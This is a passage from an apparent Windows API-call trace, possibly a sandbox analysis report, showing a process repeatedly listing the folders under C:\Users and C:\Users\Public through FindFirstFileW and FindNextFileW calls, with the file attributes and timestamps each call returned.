ftLastWriteTime.dwLowDateTime=0xfeb14f80, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="write.exe", cAlternateFileName="")) returned 0 [0246.651] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.651] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0246.651] GetFullPathNameW (in: lpFileName="C:\\Users\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\", lpFilePart=0x0) returned 0x9 [0246.651] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.652] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.652] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0246.652] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0246.652] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0246.652] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0246.652] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.653] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0246.653] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0246.653] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.653] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0246.653] GetFullPathNameW (in: lpFileName="C:\\Users\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\", lpFilePart=0x0) returned 0x9 [0246.653] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.654] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.654] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0246.654] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0246.654] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0246.654] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0246.654] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.655] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0246.655] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0246.655] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.655] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0246.655] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0246.655] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0246.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.655] GetFullPathNameW (in: lpFileName="C:\\Users\\Public", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public", lpFilePart=0x0) returned 0xf [0246.655] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\", lpFilePart=0x0) returned 0x10 [0246.655] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.656] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.656] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0246.656] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.656] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0246.657] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0246.657] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0246.657] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0246.657] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0246.657] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0246.657] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0246.658] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0246.658] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0246.658] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.658] GetFullPathNameW (in: lpFileName="C:\\Users\\Public", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public", lpFilePart=0x0) returned 0xf [0246.658] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\", lpFilePart=0x0) returned 0x10 [0246.658] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0246.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0246.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0246.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0246.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0246.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0246.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0246.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: 